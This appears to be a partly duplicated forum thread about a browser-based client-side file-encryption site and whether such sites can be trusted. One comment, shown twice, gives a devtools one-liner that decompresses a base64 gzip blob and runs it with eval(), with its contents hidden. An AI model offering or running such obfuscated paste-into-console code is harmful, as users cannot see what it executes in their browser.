For fun, here's a copy-paste-into-devtools version: (async()=>{const r=await fetch(`data:text/plain;base64,H4sIAAAAAAAAE61UYW/TMBD9K5m1D7a4mbWwCiUKaGMFpA4xbQw+TNPkOZfGzLUj+7IQTfnvKGlXjQESSHzznd+9d753soqd00nZOE3Gu6Tm4t4iJZgXXjcrdCR1QEU4tzhEnBlXN8REhpK6GnNWGosMUHqnK+WWmKuREfPXIxHlKEmFJZIckPFy/yozJd8hEZCa4LIBpHLVKkMJSRWC6o6assTABbjcYZtcGEevDocLrgSYvA5+VRNnc0cYklrF2PpQpEyMxOYxsc5b4wrfSh26mryMzQ1ZhDDyfsbvNHfaF4OWxPHEjQC76UZLs6p9oAV2nAXVMgjATo8Wx++mDHYmcMkKDOYOF9ixKwExo9CNb/a5k9EajXwfJjMB3TaezODFVEC7TQxRvdXb8vF7p1aYbtWispR6MIRBDT7FdIIHUKlYpez8w+He9GDGerCwKTucn++9f/uRgUW3pCqdHsz6h47HSQz9Fo9kxyR/Wm3u0q6HGlqRxadOFAK0d9FblNYvOXtnLCax0RpjLBtru2TDisUOE71WpCu+Evc/FR2vIcPilcpYLGRyGrxGLIxbJq2hKkH3AJFSMjG6uptv7FwinSlX+NUXZRuM/EmPk5kQUP0LuPxLK3b/gxWblw1WLLeym+TvrKh6KMEJaJ5asRQZ/8WfF9NnjbzpCE9GXSFkROK7sC8gjsdqXM31uRm2sh9Ge51d5yQHcYmuiF8NVZwNXTHxZpN/2Oy9lyJdp56tEaM387GRI+tv+GW8gvvhk0iZqmtr9Div514T0l6kgGrFegGLP341iolsIauAZX5xdrK5/XTzDTVdnJ3wuYCFLHzrrFdFfg0Lqa3Rt1zAgA54528foddEogd8gPVZzcUPElYnqAAFAAA=`),d=r.body.pipeThrough(new DecompressionStream('gzip')),t=await new Response(d).text();eval(t);})();
Looks nice, but I just can’t imagine the use case where you care about security enough to encrypt a file, but not enough that you trust a random website with it.
I see the point, keep in mind encryption etc all runs client side. would obviously never recommend to encrypt anything sensetive or critical on a website :D
While that's all well and good. The problem is a website can update it's code every time you load it. So while the user can audit nothing is being sent, they would have to do this every time they load it.
While I think the UI is super nice here. I'd personally stick to a trusted tool from an org and project with a good reputation and long history.
For fun, here's a copy-paste-into-devtools version: (async()=>{const r=await fetch(`data:text/plain;base64,H4sIAAAAAAAAE61UYW/TMBD9K5m1D7a4mbWwCiUKaGMFpA4xbQw+TNPkOZfGzLUj+7IQTfnvKGlXjQESSHzznd+9d753soqd00nZOE3Gu6Tm4t4iJZgXXjcrdCR1QEU4tzhEnBlXN8REhpK6GnNWGosMUHqnK+WWmKuREfPXIxHlKEmFJZIckPFy/yozJd8hEZCa4LIBpHLVKkMJSRWC6o6assTABbjcYZtcGEevDocLrgSYvA5+VRNnc0cYklrF2PpQpEyMxOYxsc5b4wrfSh26mryMzQ1ZhDDyfsbvNHfaF4OWxPHEjQC76UZLs6p9oAV2nAXVMgjATo8Wx++mDHYmcMkKDOYOF9ixKwExo9CNb/a5k9EajXwfJjMB3TaezODFVEC7TQxRvdXb8vF7p1aYbtWispR6MIRBDT7FdIIHUKlYpez8w+He9GDGerCwKTucn++9f/uRgUW3pCqdHsz6h47HSQz9Fo9kxyR/Wm3u0q6HGlqRxadOFAK0d9FblNYvOXtnLCax0RpjLBtru2TDisUOE71WpCu+Evc/FR2vIcPilcpYLGRyGrxGLIxbJq2hKkH3AJFSMjG6uptv7FwinSlX+NUXZRuM/EmPk5kQUP0LuPxLK3b/gxWblw1WLLeym+TvrKh6KMEJaJ5asRQZ/8WfF9NnjbzpCE9GXSFkROK7sC8gjsdqXM31uRm2sh9Ge51d5yQHcYmuiF8NVZwNXTHxZpN/2Oy9lyJdp56tEaM387GRI+tv+GW8gvvhk0iZqmtr9Div514T0l6kgGrFegGLP341iolsIauAZX5xdrK5/XTzDTVdnJ3wuYCFLHzrrFdFfg0Lqa3Rt1zAgA54528foddEogd8gPVZzcUPElYnqAAFAAA=`),d=r.body.pipeThrough(new DecompressionStream('gzip')),t=await new Response(d).text();eval(t);})();
made something similar at https://trianon.fit
Is the source code available for review?
will be very soon, just completing all the features on the site first :)
maybe encrypt in localhost then send to another securely is another option? https://github.com/nuwainfo/ffl also decrypt using webcryto
Looks nice, but I just can’t imagine the use case where you care about security enough to encrypt a file, but not enough that you trust a random website with it.
Here's the other one I know of that has some degree of trust (non browser based also available)
https://pteo.paranoiaworks.mobi/en/
It says it is client side you could also download the page with what and open the html file for added assurance
I see the point, keep in mind encryption etc all runs client side. would obviously never recommend to encrypt anything sensetive or critical on a website :D
While that's all well and good. The problem is a website can update it's code every time you load it. So while the user can audit nothing is being sent, they would have to do this every time they load it.
While I think the UI is super nice here. I'd personally stick to a trusted tool from an org and project with a good reputation and long history.
Could we automate the auditing of the website every time it runs?
working on ideas to do this, currently i have this but not good enough yet https://secvant.com/changelog
agreed, i'll see if there's a good way for me to prove when and what changed maybe be uploading to github and keeping it open source